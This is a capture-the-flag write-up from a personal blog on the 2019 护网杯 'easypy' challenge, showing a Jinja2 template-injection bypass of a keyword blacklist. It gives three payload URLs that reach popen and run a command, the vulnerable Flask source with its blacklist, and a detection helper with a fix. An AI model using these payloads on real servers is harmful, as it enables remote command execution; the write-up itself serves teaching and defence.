Hu3sky's blog

2019 护网杯 easypy

2019/09/06

Preface

This year's 护网杯 had four web challenges: two Python ones (one a zero-solve Python SSRF, the other an SSTI), one Java web that also seemed to have zero solves, and one web + reversing (os)...
I got fairly lucky: scanning with the zero-solve Python SSRF from the first challenge turned up the SSTI challenge before it was opened... I thought it was the second step of the SSRF... then as soon as the SSTI challenge went live, I submitted the flag and took first blood.

easypy

The filter is extremely brutal.

The bypass is dynamic argument passing: the blacklisted names are supplied in separate query parameters and pulled in with `attr(request.args.<name>)`, so they never appear in `data`.

This gives access to the str class.


http://49.232.103.198:57666/render?data={{%22%22|attr(request.args.param)|attr(request.args.mro)|attr(request.args.sub)()|attr(request.args.item)(77)|attr(request.args.ini)|attr(request.args.glo)}}&param=__class__&mro=__base__&sub=__subclasses__&item=__getitem__&ini=__init__&glo=__globals__

http://49.232.103.198:57666/render?data={{%22%22|attr(request.args.param)|attr(request.args.mro)|attr(request.args.sub)()|attr(request.args.item)(77)|attr(request.args.init)|attr(request.args.glo)|attr(request.args.ae)(%22popen%22)}}&param=__class__&mro=__base__&sub=__subclasses__&item=__getitem__&init=__init__&glo=__globals__&ae=__getitem__

http://49.232.103.198:57666/render?data={{%22%22|attr(request.args.param)|attr(request.args.mro)|attr(request.args.sub)()|attr(request.args.item)(77)|attr(request.args.init)|attr(request.args.glo)|attr(request.args.ae)(%22popen%22)(%22ls%22)|attr(request.args.re)()}}&param=__class__&mro=__base__&sub=__subclasses__&item=__getitem__&init=__init__&glo=__globals__&ae=__getitem__&re=read


Got the flag.

Source code

This filter is really nuts...

# -*- coding:utf-8 -*-
from flask import Flask, request, render_template_string, render_template
from markdown import markdown

app = Flask(__name__)

@app.route('/')
def index():
    return render_template('index.html')

@app.route('/render', methods=['POST','GET'])
def convert():
    # User-supplied markdown from the `data` parameter is rendered to HTML first
    md = markdown(request.args.get('data'))
    blacklist = [ "_",
    "[",
    "]",
    "write",
    "sys",
    "os",
    "join",
    "format",
    "default",
    "last",
    "first",
    "groupby",
    "lower",
    "pprint",
    "reverse",
    "slice",
    "sort",
    "striptags",
    "ident",
    "replace",
    "truncate",
    "center",
    "forceescape",
    "urlencode",
    "escape",
    "capitalize",
    "batch",
    "d",
    "join",
    "format",
    "'"]
    # Substring blacklist is applied only to the rendered `data`; other query
    # parameters (reachable via request.args inside the template) are never checked
    for i in blacklist:
        if i in md:
            return i,400
    # The rendered HTML is then evaluated as a Jinja2 template string: this is the SSTI
    content = u'{}'.format(md)
    return render_template_string(content)

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=20001)
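The weakness in the source above is that the blacklist only sees `data`, while `attr(request.args.X)` resolves the banned names from other query parameters at render time. As an added example (not from the write-up or the challenge), the following detection helper resolves those indirect references before applying the substring check, so the hidden `__class__`, `__subclasses__` and friends become visible to a log or WAF inspection; the host name and the reduced blacklist are assumptions.

```python
"""Detect Jinja2 SSTI blacklist bypass via indirect `request.args` references.

Added example, not from the original write-up: a check that only inspects
`data` misses names passed in other parameters, so resolve them first.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Subset of the challenge blacklist that is relevant to the page's payload.
BLACKLIST = ["_", "[", "]", "os", "sys", "'"]

# Matches `request.args.<name>` inside a Jinja2 expression.
ARG_REF = re.compile(r"request\.args\.([A-Za-z0-9_]+)")


def blacklist_hits(text):
    """Return the blacklisted substrings present in `text`, in list order."""
    return [token for token in BLACKLIST if token in text]


def resolve_indirect_args(url):
    """Return (raw_data, resolved_template) for a /render request URL.

    Each `request.args.<name>` in `data` is replaced with the value of query
    parameter `<name>`, which is what Jinja2 sees when it evaluates attr().
    Unknown names are left as they are.
    """
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    raw = params.get("data", [""])[0]

    def _lookup(match):
        return params.get(match.group(1), [match.group(0)])[0]

    return raw, ARG_REF.sub(_lookup, raw)


# Constructed from the first payload in the write-up; the host is a placeholder.
SAMPLE_URL = (
    "http://target.example/render?data={{%22%22|attr(request.args.param)"
    "|attr(request.args.mro)|attr(request.args.sub)()|attr(request.args.item)(77)"
    "|attr(request.args.ini)|attr(request.args.glo)}}"
    "&param=__class__&mro=__base__&sub=__subclasses__&item=__getitem__"
    "&ini=__init__&glo=__globals__"
)

if __name__ == "__main__":
    raw, resolved = resolve_indirect_args(SAMPLE_URL)
    print("raw hits:", blacklist_hits(raw), "| resolved hits:", blacklist_hits(resolved))
```

This is only a detection aid; the actual fix is to never pass user input to `render_template_string`, and instead hand the content to a fixed template as a variable.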